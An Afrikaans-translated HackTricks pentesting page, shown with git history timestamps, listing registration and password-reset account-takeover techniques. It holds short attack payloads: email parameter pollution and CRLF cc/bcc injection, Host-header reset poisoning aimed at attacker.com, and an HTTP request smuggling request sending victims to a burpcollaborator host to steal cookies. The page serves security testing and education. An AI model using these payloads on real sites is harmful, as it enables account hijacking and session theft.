hacktricks/pentesting-web/registration-vulnerabilities.md

229 lines
11 KiB
Markdown
Raw Normal View History

# Registrasie & Oorname Kwesbaarhede
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>Leer AWS hak vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-11 02:07:06 +00:00
Ander maniere om HackTricks te ondersteun:
2024-02-03 14:45:32 +00:00
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat** Kontroleer die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
2024-02-11 02:07:06 +00:00
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Deel jou haktruuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
</details>
### [WhiteIntel](https://whiteintel.io)
<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) is 'n **donker-web** aangedrewe soekenjin wat **gratis** funksies bied om te kontroleer of 'n maatskappy of sy kliënte deur **steel-malware** is **gekompromiteer**.
Hul primêre doel van WhiteIntel is om rekeningoorname en losprysaanvalle te beveg wat voortspruit uit inligtingsteel-malware.
Jy kan hul webwerf besoek en hul enjin **gratis** probeer by:
{% embed url="https://whiteintel.io" %}
***
## Registrasie Oorname
2022-04-28 16:01:33 +00:00
2024-02-11 02:07:06 +00:00
### Duplikaat Registrasie
2021-06-27 14:55:59 +00:00
* Probeer om te genereer met 'n bestaande gebruikersnaam
2024-02-11 02:07:06 +00:00
* Kontroleer variasie in die e-pos:
* hoofletters
* \+1@
* voeg 'n paar punte by in die e-pos
* spesiale karakters in die e-posnaam (%00, %09, %20)
* Plaas swart karakters na die e-pos: `test@test.com a`
* victim@gmail.com@attacker.com
* victim@attacker.com@gmail.com
2021-06-27 14:55:59 +00:00
### Gebruikersnaam Enumerasie
2021-06-27 14:55:59 +00:00
Kyk of jy kan uitfigure wanneer 'n gebruikersnaam reeds geregistreer is binne die aansoek.
2021-06-27 14:55:59 +00:00
2024-02-11 02:07:06 +00:00
### Wagwoordbeleid
2021-06-27 14:55:59 +00:00
Skep 'n gebruiker en kyk na die wagwoordbeleid (kyk of jy swak wagwoorde kan gebruik).\
In daardie geval kan jy probeer om geloofsbriewe te bruteforce.
2021-06-27 14:55:59 +00:00
### SQL Injeksie
2021-06-27 14:55:59 +00:00
[Kyk na hierdie bladsy](sql-injection/#insert-statement) om te leer hoe om rekeningoorname te probeer of inligting te onttrek via **SQL Injeksies** in registrasievorms.
2021-06-27 14:55:59 +00:00
### Oauth Oorname
2021-06-27 14:55:59 +00:00
2023-02-16 18:26:56 +00:00
{% content-ref url="oauth-to-account-takeover.md" %}
[oauth-to-account-takeover.md](oauth-to-account-takeover.md)
{% endcontent-ref %}
2021-06-27 14:55:59 +00:00
### SAML Kwesbaarhede
2021-06-27 14:55:59 +00:00
{% content-ref url="saml-attacks/" %}
[saml-attacks](saml-attacks/)
{% endcontent-ref %}
2024-02-11 02:07:06 +00:00
### Verander E-pos
Wanneer geregistreer, probeer om die e-pos te verander en kyk of hierdie verandering korrek gevalideer word of dit na willekeurige e-posse kan verander.
2021-06-27 14:55:59 +00:00
2024-02-11 02:07:06 +00:00
### Meer Kontroles
2021-11-30 00:17:48 +00:00
2024-02-11 02:07:06 +00:00
* Kyk of jy **weggooi-e-posse** kan gebruik
* **Lang** **wagwoord** (>200) lei tot **DoS**
* **Kyk na tempo-limiete op rekening-skepping**
2024-02-11 02:07:06 +00:00
* Gebruik username@**burp\_collab**.net en analiseer die **terugroep**
## **Wagwoord Herstel Oorname**
### Wagwoord Herstel Token Lek via Verwysing <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
1. Versoek wagwoordherstel na jou e-posadres
2. Klik op die wagwoordherstel skakel
3. Verander nie wagwoord nie
4. Klik op enige 3de party webwerwe (bv: Facebook, twitter)
5. Onderskep die versoek in Burp Suite proxy
6. Kyk of die verwysingskop wagwoordherstel-token lek.
### Wagwoord Herstel Vergiftiging <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>
1. Onderskep die wagwoordherstel versoek in Burp Suite
2. Voeg of wysig die volgende koppe in Burp Suite by: `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Stuur die versoek met die gewysigde kop\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. Soek na 'n wagwoordherstel-URL gebaseer op die _host-kop_ soos: `https://attacker.com/reset-password.php?token=TOKEN`
### Wagwoord Herstel Via E-pos Parameter <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
2021-11-30 00:17:48 +00:00
```powershell
# parameter pollution
email=victim@mail.com&email=hacker@mail.com
# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}
# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com
# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
```
2024-02-11 02:07:06 +00:00
### IDOR op API-parameters <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>
2021-11-30 00:17:48 +00:00
1. Aanvaller moet inlog met hul rekening en na die **Wagwoord verander**-funksie gaan.
2. Begin die Burp Suite en onderskep die versoek.
3. Stuur dit na die herhalingskategorie en wysig die parameters: Gebruiker-ID/e-pos\
`powershell POST /api/changepass [...] ("vorm": {"e-pos":"slagoffer@e-pos.com","wagwoord":"veilige wagwoord"})`
2021-11-30 00:17:48 +00:00
### Swak Wagwoord-herstelteken <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>
2021-11-30 00:17:48 +00:00
Die wagwoord-herstelteken moet ewekansig gegenereer en uniek wees elke keer.\
Probeer bepaal of die teken verval of altyd dieselfde is, in sommige gevalle is die genereringsalgoritme swak en kan geraden word. Die volgende veranderlikes kan deur die algoritme gebruik word.
2021-11-30 00:17:48 +00:00
* Tydstempel
* Gebruiker-ID
* E-pos van Gebruiker
* Voornaam en Van
2024-02-11 02:07:06 +00:00
* Geboortedatum
* Kriptografie
* Slegs nommer
* Klein tekenreeks (karakters tussen \[A-Z,a-z,0-9])
* Tekenhergebruik
* Tekenvervaldatum
2021-11-30 00:17:48 +00:00
### Uitlek van Wagwoord-herstelteken <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>
2021-11-30 00:17:48 +00:00
1. Trigger 'n wagwoord-herstelversoek deur die API/UI vir 'n spesifieke e-pos bv: toets@pos.com
2. Inspekteer die bedienerreaksie en soek na `resetToken`
3. Gebruik dan die teken in 'n URL soos `https://voorbeeld.com/v3/gebruiker/wagwoord/herstel?resetToken=[DIE_RESET_TEKEN]&e-pos=[DIE_POS]`
2021-11-30 00:17:48 +00:00
### Wagwoord-herstel via Gebruikersnaam-botsing <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
2021-11-30 00:17:48 +00:00
1. Registreer op die stelsel met 'n gebruikersnaam identies aan die slagoffer se gebruikersnaam, maar met spasies ingevoeg voor en/of na die gebruikersnaam. bv: `"admin "`
2. Vra 'n wagwoordherstel met jou skadelike gebruikersnaam aan.
3. Gebruik die teken wat na jou e-pos gestuur is en herstel die slagoffer se wagwoord.
4. Koppel aan die slagoffer se rekening met die nuwe wagwoord.
2021-11-30 00:17:48 +00:00
Die platform CTFd was vatbaar vir hierdie aanval.\
Sien: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
2021-11-30 00:17:48 +00:00
### Rekening-oorneem via Kruissite-skripsing <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>
2021-11-30 00:17:48 +00:00
1. Vind 'n Kruissite-skripsing binne die aansoek of 'n subdomein as die koekies toegespits is op die ouer domein: `*.domein.com`
2. Laat die huidige **sessiekoekie** uitlek.
3. Verifieer as die gebruiker deur die koekie.
2021-11-30 00:17:48 +00:00
### Rekening-oorneem via HTTP-versoeksmokkel <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
2021-11-30 00:17:48 +00:00
1\. Gebruik **smuggler** om die tipe HTTP-versoeksmokkeling (CL, TE, CL.TE) op te spoor\
2021-11-30 00:17:48 +00:00
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
2\. Stel 'n versoek op wat die `POST / HTTP/1.1` sal oorskryf met die volgende data:\
`GET http://iets.burpcollaborator.net HTTP/1.1 X:` met die doel om die slagoffers na burpcollab te oopverwys en hul koekies te steel\
3\. Die finale versoek kan so lyk:
2021-11-30 00:17:48 +00:00
```
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0
GET http://something.burpcollaborator.net HTTP/1.1
X: X
```
Hackerone-rapporteerders wat hierdie fout uitgebuit het\
\* [https://hackerone.com/reports/737140](https://hackerone.com/reports/737140)\
\* [https://hackerone.com/reports/771666](https://hackerone.com/reports/771666)
### Rekening-oorneem deur CSRF <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
2021-11-30 00:17:48 +00:00
1. Skep 'n lading vir die CSRF, bv: "HTML-vorm met outomatiese indiening vir 'n wagwoordverandering"
2024-02-11 02:07:06 +00:00
2. Stuur die lading
2021-11-30 00:17:48 +00:00
### Rekening-oorneem deur JWT <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
2021-11-30 00:17:48 +00:00
2024-02-11 02:07:06 +00:00
JSON Web Token kan gebruik word om 'n gebruiker te verifieer.
2021-11-30 00:17:48 +00:00
* Wysig die JWT met 'n ander Gebruiker-ID / E-pos
* Kontroleer vir swak JWT-handtekening
2021-11-30 00:17:48 +00:00
{% content-ref url="hacking-jwt-json-web-tokens.md" %}
[hacking-jwt-json-web-tokens.md](hacking-jwt-json-web-tokens.md)
{% endcontent-ref %}
2024-02-11 02:07:06 +00:00
## Verwysings
2021-11-30 00:17:48 +00:00
* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)
2022-04-28 16:01:33 +00:00
### [WhiteIntel](https://whiteintel.io)
<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) is 'n **donkerweb**-aangedrewe soekenjin wat **gratis** funksies bied om te kontroleer of 'n maatskappy of sy kliënte deur **diewe-malware** gekompromitteer is.
Die primêre doel van WhiteIntel is om rekening-oorneem en lospryse-aanvalle te bekamp wat voortspruit uit inligtingsteel-malware.
Jy kan hul webwerf besoek en hul enjin **gratis** probeer by:
{% embed url="https://whiteintel.io" %}
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>Leer AWS-hacking van niks tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-11 02:07:06 +00:00
Ander maniere om HackTricks te ondersteun:
2024-02-03 14:45:32 +00:00
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat** Kontroleer die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks-klere**](https://peass.creator-spring.com)
* Ontdek [**Die PEASS-familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
2024-02-11 02:07:06 +00:00
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
2022-04-28 16:01:33 +00:00
</details>